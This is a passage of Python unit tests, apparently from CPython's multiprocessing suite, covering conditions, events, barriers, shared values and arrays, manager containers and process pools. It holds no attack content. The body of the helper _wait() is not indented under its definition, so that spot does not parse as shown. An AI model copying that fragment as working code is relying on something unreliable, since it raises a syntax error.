        p.start()
        with cond:
            result = cond.wait_for(lambda : state.value==0)
            self.assertTrue(result)
            self.assertEqual(state.value, 0)
        for i in range(4):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()
        join_process(p)
        self.assertEqual(p.exitcode, 0)
    @classmethod
    def _test_waitfor_timeout_f(cls, cond, state, success, sem):
        # Child: wait_for a predicate that never becomes true and verify
        # the call times out within a sane window around *expected*.
        sem.release()
        with cond:
            expected = 0.1
            dt = time.monotonic()
            result = cond.wait_for(lambda : state.value==4, timeout=expected)
            dt = time.monotonic() - dt
            # borrow logic in assertTimeout() from test/lock_tests.py
            if not result and expected * 0.6 < dt < expected * 10.0:
                success.value = True
    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor_timeout(self):
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', 0)
        success = self.Value('i', False)
        sem = self.Semaphore(0)
        p = self.Process(target=self._test_waitfor_timeout_f,
                         args=(cond, state, success, sem))
        p.daemon = True
        p.start()
        self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
        # Only increment 3 times, so state == 4 is never reached.
        for i in range(3):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()
        join_process(p)
        self.assertTrue(success.value)
    @classmethod
    def _test_wait_result(cls, c, pid):
        # Child: notify the waiter, then (on POSIX) interrupt the parent
        # with SIGINT while it is waiting again.
        with c:
            c.notify()
        time.sleep(1)
        if pid is not None:
            os.kill(pid, signal.SIGINT)
    def test_wait_result(self):
        if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
            pid = os.getpid()
        else:
            pid = None
        c = self.Condition()
        with c:
            # No notifier yet: both timed waits must report failure.
            self.assertFalse(c.wait(0))
            self.assertFalse(c.wait(0.1))
            p = self.Process(target=self._test_wait_result, args=(c, pid))
            p.start()
            self.assertTrue(c.wait(60))
            if pid is not None:
                self.assertRaises(KeyboardInterrupt, c.wait, 60)
        p.join()
class _TestEvent(BaseTestCase):
    """Event set/clear/wait semantics, including cross-process set()."""
    @classmethod
    def _test_event(cls, event):
        # Child: set the event after a delay so the parent's wait() blocks.
        time.sleep(TIMEOUT2)
        event.set()
    def test_event(self):
        event = self.Event()
        wait = TimingWrapper(event.wait)
        # Removed temporarily, due to API shear, this does not
        # work with threading._Event objects. is_set == isSet
        self.assertEqual(event.is_set(), False)
        # Removed, threading.Event.wait() will return the value of the __flag
        # instead of None. API Shear with the semaphore backed mp.Event
        self.assertEqual(wait(0.0), False)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
        event.set()
        # See note above on the API differences
        self.assertEqual(event.is_set(), True)
        # Once set, wait() returns True immediately regardless of timeout.
        self.assertEqual(wait(), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        # self.assertEqual(event.is_set(), True)
        event.clear()
        #self.assertEqual(event.is_set(), False)
        # A child setting the event must unblock the parent's wait().
        p = self.Process(target=self._test_event, args=(event,))
        p.daemon = True
        p.start()
        self.assertEqual(wait(), True)
        p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
    """Cross-process 'atomic counter' with a minimal list-like API.

    Backed by a shared heap buffer holding one C int plus a
    multiprocessing.Lock; append() increments the count and __len__()
    reads it.  The appended value itself is discarded — only the count
    matters — so instances can stand in for plain lists in the Barrier
    tests when real processes are used.  __getstate__/__setstate__ make
    instances picklable for spawn-based start methods.
    """
    def __init__(self):
        wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
        lock = multiprocessing.Lock()
        self.__setstate__((wrapper, lock))
        self._lengthbuf[0] = 0
    def __setstate__(self, state):
        (self._wrapper, self._lock) = state
        # Re-create the int view onto the shared buffer after unpickling.
        self._lengthbuf = self._wrapper.create_memoryview().cast('i')
    def __getstate__(self):
        return (self._wrapper, self._lock)
    def append(self, _):
        with self._lock:
            self._lengthbuf[0] += 1
    def __len__(self):
        with self._lock:
            return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
    """
    A bunch of threads.
    """
    def __init__(self, namespace, f, args, n, wait_before_exit=False):
        """
        Construct a bunch of `n` threads running the same function `f`.
        If `wait_before_exit` is True, the threads won't terminate until
        do_finish() is called.

        *namespace* supplies the concurrency flavor (Process, Event,
        DummyList), so despite the name the workers may be real processes.
        """
        self.f = f
        self.args = args
        self.n = n
        # Shared counters; appended pids track start/finish progress.
        self.started = namespace.DummyList()
        self.finished = namespace.DummyList()
        self._can_exit = namespace.Event()
        if not wait_before_exit:
            self._can_exit.set()
        threads = []
        for i in range(n):
            p = namespace.Process(target=self.task)
            p.daemon = True
            p.start()
            threads.append(p)
        # Join all workers when the Bunch is closed or garbage-collected.
        def finalize(threads):
            for p in threads:
                p.join()
        self._finalizer = weakref.finalize(self, finalize, threads)
    def task(self):
        # Worker body: record start, run f, record finish, then hold the
        # worker alive until do_finish() allows it to exit.
        pid = os.getpid()
        self.started.append(pid)
        try:
            self.f(*self.args)
        finally:
            self.finished.append(pid)
            self._can_exit.wait(30)
            assert self._can_exit.is_set()
    def wait_for_started(self):
        while len(self.started) < self.n:
            _wait()
    def wait_for_finished(self):
        while len(self.finished) < self.n:
            _wait()
    def do_finish(self):
        self._can_exit.set()
    def close(self):
        self._finalizer()
class AppendTrue(object):
    """Picklable callable that appends True to the wrapped container on
    each call (a lambda would not pickle for spawned processes)."""
    def __init__(self, obj):
        self.obj = obj
    def __call__(self):
        target = self.obj
        target.append(True)
class _TestBarrier(BaseTestCase):
    """
    Tests for Barrier objects.
    """
    N = 5
    defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
    def setUp(self):
        self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
    def tearDown(self):
        self.barrier.abort()
        self.barrier = None
    def DummyList(self):
        # Atomic counter appropriate for the current flavor: a plain list
        # for threads, a manager list, or the shared-memory _DummyList.
        if self.TYPE == 'threads':
            return []
        elif self.TYPE == 'manager':
            return self.manager.list()
        else:
            return _DummyList()
    def run_threads(self, f, args):
        # Run f in N-1 workers plus the current thread/process.
        b = Bunch(self, f, args, self.N-1)
        try:
            f(*args)
            b.wait_for_finished()
        finally:
            b.close()
    @classmethod
    def multipass(cls, barrier, results, n):
        # Each of n passes: everyone increments results[0], waits, then
        # increments results[1]; the length checks prove lockstep progress.
        m = barrier.parties
        assert m == cls.N
        for i in range(n):
            results[0].append(True)
            assert len(results[1]) == i * m
            barrier.wait()
            results[1].append(True)
            assert len(results[0]) == (i + 1) * m
            barrier.wait()
        try:
            assert barrier.n_waiting == 0
        except NotImplementedError:
            pass
        assert not barrier.broken
    def test_barrier(self, passes=1):
        """
        Test that a barrier is passed in lockstep
        """
        results = [self.DummyList(), self.DummyList()]
        self.run_threads(self.multipass, (self.barrier, results, passes))
    def test_barrier_10(self):
        """
        Test that a barrier works for 10 consecutive runs
        """
        return self.test_barrier(10)
    @classmethod
    def _test_wait_return_f(cls, barrier, queue):
        res = barrier.wait()
        queue.put(res)
    def test_wait_return(self):
        """
        test the return value from barrier.wait
        """
        queue = self.Queue()
        self.run_threads(self._test_wait_return_f, (self.barrier, queue))
        results = [queue.get() for i in range(self.N)]
        # wait() returns each party a distinct index; exactly one gets 0.
        self.assertEqual(results.count(0), 1)
        close_queue(queue)
    @classmethod
    def _test_action_f(cls, barrier, results):
        barrier.wait()
        if len(results) != 1:
            raise RuntimeError
    def test_action(self):
        """
        Test the 'action' callback
        """
        results = self.DummyList()
        barrier = self.Barrier(self.N, action=AppendTrue(results))
        self.run_threads(self._test_action_f, (barrier, results))
        self.assertEqual(len(results), 1)
    @classmethod
    def _test_abort_f(cls, barrier, results1, results2):
        # One designated party raises; its abort() breaks the barrier for
        # everyone else, who record BrokenBarrierError in results2.
        try:
            i = barrier.wait()
            if i == cls.N//2:
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()
    def test_abort(self):
        """
        Test that an abort will put the barrier in a broken state
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        self.run_threads(self._test_abort_f,
                         (self.barrier, results1, results2))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertTrue(self.barrier.broken)
    @classmethod
    def _test_reset_f(cls, barrier, results1, results2, results3):
        i = barrier.wait()
        if i == cls.N//2:
            # Wait until the other threads are all in the barrier.
            while barrier.n_waiting < cls.N-1:
                time.sleep(0.001)
            barrier.reset()
        else:
            try:
                barrier.wait()
                results1.append(True)
            except threading.BrokenBarrierError:
                results2.append(True)
        # Now, pass the barrier again
        barrier.wait()
        results3.append(True)
    def test_reset(self):
        """
        Test that a 'reset' on a barrier frees the waiting threads
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        self.run_threads(self._test_reset_f,
                         (self.barrier, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertEqual(len(results3), self.N)
    @classmethod
    def _test_abort_and_reset_f(cls, barrier, barrier2,
                                results1, results2, results3):
        try:
            i = barrier.wait()
            if i == cls.N//2:
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()
        # Synchronize and reset the barrier. Must synchronize first so
        # that everyone has left it when we reset, and after so that no
        # one enters it before the reset.
        if barrier2.wait() == cls.N//2:
            barrier.reset()
        barrier2.wait()
        barrier.wait()
        results3.append(True)
    def test_abort_and_reset(self):
        """
        Test that a barrier can be reset after being broken.
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        barrier2 = self.Barrier(self.N)
        self.run_threads(self._test_abort_and_reset_f,
                         (self.barrier, barrier2, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertEqual(len(results3), self.N)
    @classmethod
    def _test_timeout_f(cls, barrier, results):
        i = barrier.wait()
        if i == cls.N//2:
            # One thread is late!
            time.sleep(1.0)
        try:
            barrier.wait(0.5)
        except threading.BrokenBarrierError:
            results.append(True)
    def test_timeout(self):
        """
        Test wait(timeout)
        """
        results = self.DummyList()
        self.run_threads(self._test_timeout_f, (self.barrier, results))
        self.assertEqual(len(results), self.barrier.parties)
    @classmethod
    def _test_default_timeout_f(cls, barrier, results):
        i = barrier.wait(cls.defaultTimeout)
        if i == cls.N//2:
            # One thread is later than the default timeout
            time.sleep(1.0)
        try:
            barrier.wait()
        except threading.BrokenBarrierError:
            results.append(True)
    def test_default_timeout(self):
        """
        Test the barrier's default timeout
        """
        barrier = self.Barrier(self.N, timeout=0.5)
        results = self.DummyList()
        self.run_threads(self._test_default_timeout_f, (barrier, results))
        self.assertEqual(len(results), barrier.parties)
    def test_single_thread(self):
        # A 1-party barrier never blocks.
        b = self.Barrier(1)
        b.wait()
        b.wait()
    @classmethod
    def _test_thousand_f(cls, barrier, passes, conn, lock):
        for i in range(passes):
            barrier.wait()
            with lock:
                conn.send(i)
    def test_thousand(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        passes = 1000
        lock = self.Lock()
        conn, child_conn = self.Pipe(False)
        for j in range(self.N):
            p = self.Process(target=self._test_thousand_f,
                             args=(self.barrier, passes, child_conn, lock))
            p.start()
            self.addCleanup(p.join)
        # Lockstep check: every party must report pass i before any
        # reports pass i+1.
        for i in range(passes):
            for j in range(self.N):
                self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
    """Tests for multiprocessing.Value / RawValue shared ctypes scalars."""

    ALLOWED_TYPES = ('processes',)

    # (typecode, initial value, value written by the child process)
    codes_values = [
        ('i', 4343, 24234),
        ('d', 3.625, -4.25),
        ('h', -232, 234),
        ('q', 2 ** 33, 2 ** 34),
        ('c', latin('x'), latin('y'))
        ]

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _test(cls, values):
        # Child process: overwrite each shared value with the third element
        # of the corresponding codes_values entry.
        for sv, cv in zip(values, cls.codes_values):
            sv.value = cv[2]

    def test_value(self, raw=False):
        """Writes made by a child process are visible in the parent."""
        if raw:
            values = [self.RawValue(code, value)
                      for code, value, _ in self.codes_values]
        else:
            values = [self.Value(code, value)
                      for code, value, _ in self.codes_values]

        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[1])

        proc = self.Process(target=self._test, args=(values,))
        proc.daemon = True
        proc.start()
        proc.join()

        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[2])

    def test_rawvalue(self):
        self.test_value(raw=True)

    def test_getobj_getlock(self):
        """get_lock()/get_obj() availability depends on the lock argument."""
        val1 = self.Value('i', 5)
        lock1 = val1.get_lock()
        obj1 = val1.get_obj()

        val2 = self.Value('i', 5, lock=None)
        lock2 = val2.get_lock()
        obj2 = val2.get_obj()

        lock = self.Lock()
        val3 = self.Value('i', 5, lock=lock)
        lock3 = val3.get_lock()
        obj3 = val3.get_obj()
        self.assertEqual(lock, lock3)

        # lock=False produces a raw object without the lock wrappers.
        arr4 = self.Value('i', 5, lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))

        self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')

        arr5 = self.RawValue('i', 5)
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
    """Tests for multiprocessing.Array / RawArray shared ctypes arrays."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def f(cls, seq):
        # Child process: replace seq with its running prefix sums, in place.
        for i in range(1, len(seq)):
            seq[i] += seq[i-1]

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array(self, raw=False):
        """Shared arrays support len/indexing/slicing and in-place mutation
        performed by a child process."""
        seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
        if raw:
            arr = self.RawArray('i', seq)
        else:
            arr = self.Array('i', seq)

        self.assertEqual(len(arr), len(seq))
        self.assertEqual(arr[3], seq[3])
        self.assertEqual(list(arr[2:7]), list(seq[2:7]))

        arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])

        self.assertEqual(list(arr[:]), seq)

        # Apply the same transformation locally and in a child, then compare.
        self.f(seq)

        p = self.Process(target=self.f, args=(arr,))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(list(arr[:]), seq)

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array_from_size(self):
        size = 10
        # Test for zeroing (see issue #11675).
        # The repetition below strengthens the test by increasing the chances
        # of previously allocated non-zero memory being used for the new array
        # on the 2nd and 3rd loops.
        for _ in range(3):
            arr = self.Array('i', size)
            self.assertEqual(len(arr), size)
            self.assertEqual(list(arr), [0] * size)
            arr[:] = range(10)
            self.assertEqual(list(arr), list(range(10)))
            del arr

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_rawarray(self):
        self.test_array(raw=True)

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_getobj_getlock_obj(self):
        """get_lock()/get_obj() availability depends on the lock argument."""
        arr1 = self.Array('i', list(range(10)))
        lock1 = arr1.get_lock()
        obj1 = arr1.get_obj()

        arr2 = self.Array('i', list(range(10)), lock=None)
        lock2 = arr2.get_lock()
        obj2 = arr2.get_obj()

        lock = self.Lock()
        arr3 = self.Array('i', list(range(10)), lock=lock)
        lock3 = arr3.get_lock()
        obj3 = arr3.get_obj()
        self.assertEqual(lock, lock3)

        # lock=False produces a raw object without the lock wrappers.
        arr4 = self.Array('i', range(10), lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))
        self.assertRaises(AttributeError,
                          self.Array, 'i', range(10), lock='notalock')

        arr5 = self.RawArray('i', range(10))
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
    """Tests for manager-backed container proxies (list, dict, Namespace)."""

    ALLOWED_TYPES = ('manager',)

    def test_list(self):
        a = self.list(list(range(10)))
        self.assertEqual(a[:], list(range(10)))

        b = self.list()
        self.assertEqual(b[:], [])

        b.extend(list(range(5)))
        self.assertEqual(b[:], list(range(5)))

        self.assertEqual(b[2], 2)
        self.assertEqual(b[2:10], [2,3,4])

        b *= 2
        self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])

        self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])

        self.assertEqual(a[:], list(range(10)))

        # A list proxy built from other proxies copies their contents.
        d = [a, b]
        e = self.list(d)
        self.assertEqual(
            [element[:] for element in e],
            [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
            )

        f = self.list([a])
        a.append('hello')
        self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])

    def test_list_iter(self):
        a = self.list(list(range(10)))
        it = iter(a)
        self.assertEqual(list(it), list(range(10)))
        self.assertEqual(list(it), [])  # exhausted
        # list modified during iteration
        it = iter(a)
        a[0] = 100
        self.assertEqual(next(it), 100)

    def test_list_proxy_in_list(self):
        a = self.list([self.list(range(3)) for _i in range(3)])
        self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)

        a[0][-1] = 55
        self.assertEqual(a[0][:], [0, 1, 55])
        for i in range(1, 3):
            self.assertEqual(a[i][:], [0, 1, 2])

        self.assertEqual(a[1].pop(), 2)
        self.assertEqual(len(a[1]), 2)
        for i in range(0, 3, 2):
            self.assertEqual(len(a[i]), 3)

        del a

        # A proxy may even contain itself; deletion must not hang.
        b = self.list()
        b.append(b)
        del b

    def test_dict(self):
        d = self.dict()
        indices = list(range(65, 70))
        for i in indices:
            d[i] = chr(i)
        self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
        self.assertEqual(sorted(d.keys()), indices)
        self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
        self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])

    def test_dict_iter(self):
        d = self.dict()
        indices = list(range(65, 70))
        for i in indices:
            d[i] = chr(i)
        it = iter(d)
        self.assertEqual(list(it), indices)
        self.assertEqual(list(it), [])  # exhausted
        # dictionary changed size during iteration
        it = iter(d)
        d.clear()
        self.assertRaises(RuntimeError, next, it)

    def test_dict_proxy_nested(self):
        # Nested proxies: mutations through the outer dict must be visible
        # through the inner proxies and vice versa.
        pets = self.dict(ferrets=2, hamsters=4)
        supplies = self.dict(water=10, feed=3)
        d = self.dict(pets=pets, supplies=supplies)

        self.assertEqual(supplies['water'], 10)
        self.assertEqual(d['supplies']['water'], 10)

        d['supplies']['blankets'] = 5
        self.assertEqual(supplies['blankets'], 5)
        self.assertEqual(d['supplies']['blankets'], 5)

        d['supplies']['water'] = 7
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(d['supplies']['water'], 7)

        # Dropping the local references must not invalidate the nested
        # proxies still reachable through d.
        del pets
        del supplies
        self.assertEqual(d['pets']['ferrets'], 2)
        d['supplies']['blankets'] = 11
        self.assertEqual(d['supplies']['blankets'], 11)

        pets = d['pets']
        supplies = d['supplies']
        supplies['water'] = 7
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(d['supplies']['water'], 7)

        d.clear()
        self.assertEqual(len(d), 0)
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(pets['hamsters'], 4)

        l = self.list([pets, supplies])
        l[0]['marmots'] = 1
        self.assertEqual(pets['marmots'], 1)
        self.assertEqual(l[0]['marmots'], 1)

        del pets
        del supplies
        self.assertEqual(l[0]['marmots'], 1)

        outer = self.list([[88, 99], l])
        self.assertIsInstance(outer[0], list)  # Not a ListProxy
        self.assertEqual(outer[-1][-1]['feed'], 3)

    def test_namespace(self):
        n = self.Namespace()
        n.name = 'Bob'
        n.job = 'Builder'
        n._hidden = 'hidden'
        self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
        del n.job
        # Underscore-prefixed attributes are hidden from the repr.
        self.assertEqual(str(n), "Namespace(name='Bob')")
        self.assertTrue(hasattr(n, 'name'))
        self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
    """Return ``x * x`` after sleeping *wait* seconds (pool-test helper)."""
    time.sleep(wait)
    return x * x
def mul(x, y):
    """Return the product of *x* and *y* (starmap-test helper)."""
    return x * y
def raise_large_valuerror(wait):
    """Sleep *wait* seconds, then raise a ValueError carrying a ~1 MiB
    message (used to stress result-queue draining in pool tests)."""
    time.sleep(wait)
    raise ValueError("x" * 1024**2)
def identity(x):
    """Return *x* unchanged."""
    return x
class CountedObject(object):
    """Object whose class keeps a live-instance count, used to verify that
    pool task arguments/results are released (see test_release_task_refs)."""

    # Number of instances currently alive.
    n_instances = 0

    def __new__(cls):
        cls.n_instances += 1
        return object.__new__(cls)

    def __del__(self):
        type(self).n_instances -= 1
class SayWhenError(ValueError):
    """Raised by exception_throwing_generator when its trigger index is hit."""
def exception_throwing_generator(total, when):
    """Yield the integers 0 .. total-1, raising SayWhenError as soon as the
    index *when* is reached; when == -1 raises before anything is yielded."""
    if when == -1:
        raise SayWhenError("Somebody said when")
    i = 0
    while i < total:
        if i == when:
            raise SayWhenError("Somebody said when")
        yield i
        i += 1
class _TestPool(BaseTestCase):
    """Tests exercising the multiprocessing.Pool API (apply/map/imap/...)."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # One shared 4-worker pool for the whole test class.
        cls.pool = cls.Pool(4)

    @classmethod
    def tearDownClass(cls):
        cls.pool.terminate()
        cls.pool.join()
        cls.pool = None
        super().tearDownClass()

    def test_apply(self):
        papply = self.pool.apply
        self.assertEqual(papply(sqr, (5,)), sqr(5))
        self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))

    def test_map(self):
        pmap = self.pool.map
        self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
        self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
                         list(map(sqr, list(range(100)))))

    def test_starmap(self):
        psmap = self.pool.starmap
        tuples = list(zip(range(10), range(9,-1, -1)))
        self.assertEqual(psmap(mul, tuples),
                         list(itertools.starmap(mul, tuples)))
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(psmap(mul, tuples, chunksize=20),
                         list(itertools.starmap(mul, tuples)))

    def test_starmap_async(self):
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
                         list(itertools.starmap(mul, tuples)))

    def test_map_async(self):
        self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
                         list(map(sqr, list(range(10)))))

    def test_map_async_callbacks(self):
        call_args = self.manager.list() if self.TYPE == 'manager' else []
        self.pool.map_async(int, ['1'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(1, len(call_args))
        self.assertEqual([1], call_args[0])
        self.pool.map_async(int, ['a'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(2, len(call_args))
        self.assertIsInstance(call_args[1], ValueError)

    def test_map_unplicklable(self):
        # Issue #19425 -- failure to pickle should not cause a hang
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class A(object):
            def __reduce__(self):
                raise RuntimeError('cannot pickle')
        with self.assertRaises(RuntimeError):
            self.pool.map(sqr, [A()]*10)

    def test_map_chunksize(self):
        try:
            self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
        except multiprocessing.TimeoutError:
            self.fail("pool.map_async with chunksize stalled on null list")

    def test_map_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
        # again, make sure it's reentrant
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)

        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(10, 3), 1)

        # An iterable whose __next__ always fails must also propagate.
        class SpecialIterable:
            def __iter__(self):
                return self
            def __next__(self):
                raise SayWhenError
            def __len__(self):
                return 1
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)

    def test_async(self):
        res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
        get = TimingWrapper(res.get)
        self.assertEqual(get(), 49)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)

    def test_async_timeout(self):
        res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
        get = TimingWrapper(res.get)
        self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)

    def test_imap(self):
        it = self.pool.imap(sqr, list(range(10)))
        self.assertEqual(list(it), list(map(sqr, list(range(10)))))

        it = self.pool.imap(sqr, list(range(10)))
        for i in range(10):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)

        it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
        for i in range(1000):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)

    def test_imap_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)

        it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
        for i in range(3):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)

        # SayWhenError seen at start of problematic chunk's results
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
        for i in range(6):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
        for i in range(4):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)

    def test_imap_unordered(self):
        it = self.pool.imap_unordered(sqr, list(range(10)))
        self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))

        it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
        self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))

    def test_imap_unordered_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)

        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(10, 3),
                                      1)
        expected_values = list(map(sqr, list(range(10))))
        with self.assertRaises(SayWhenError):
            # imap_unordered makes it difficult to anticipate the SayWhenError
            for i in range(10):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)

        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(20, 7),
                                      2)
        expected_values = list(map(sqr, list(range(20))))
        with self.assertRaises(SayWhenError):
            for i in range(20):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)

    def test_make_pool(self):
        expected_error = (RemoteError if self.TYPE == 'manager'
                          else ValueError)

        # Non-positive worker counts must be rejected.
        self.assertRaises(expected_error, self.Pool, -1)
        self.assertRaises(expected_error, self.Pool, 0)

        if self.TYPE != 'manager':
            p = self.Pool(3)
            try:
                self.assertEqual(3, len(p._pool))
            finally:
                p.close()
                p.join()

    def test_terminate(self):
        result = self.pool.map_async(
            time.sleep, [0.1 for i in range(10000)], chunksize=1
            )
        self.pool.terminate()
        join = TimingWrapper(self.pool.join)
        join()
        # Sanity check the pool didn't wait for all tasks to finish
        self.assertLess(join.elapsed, 2.0)

    def test_empty_iterable(self):
        # See Issue 12157
        p = self.Pool(1)

        self.assertEqual(p.map(sqr, []), [])
        self.assertEqual(list(p.imap(sqr, [])), [])
        self.assertEqual(list(p.imap_unordered(sqr, [])), [])
        self.assertEqual(p.map_async(sqr, []).get(), [])

        p.close()
        p.join()

    def test_context(self):
        if self.TYPE == 'processes':
            L = list(range(10))
            expected = [sqr(i) for i in L]
            with self.Pool(2) as p:
                r = p.map_async(sqr, L)
                self.assertEqual(r.get(), expected)
            p.join()
            # Leaving the with-block terminated the pool, so further use fails.
            self.assertRaises(ValueError, p.map_async, sqr, L)

    @classmethod
    def _test_traceback(cls):
        raise RuntimeError(123) # some comment

    def test_traceback(self):
        # We want ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
        if self.TYPE == 'processes':
            with self.Pool(1) as p:
                try:
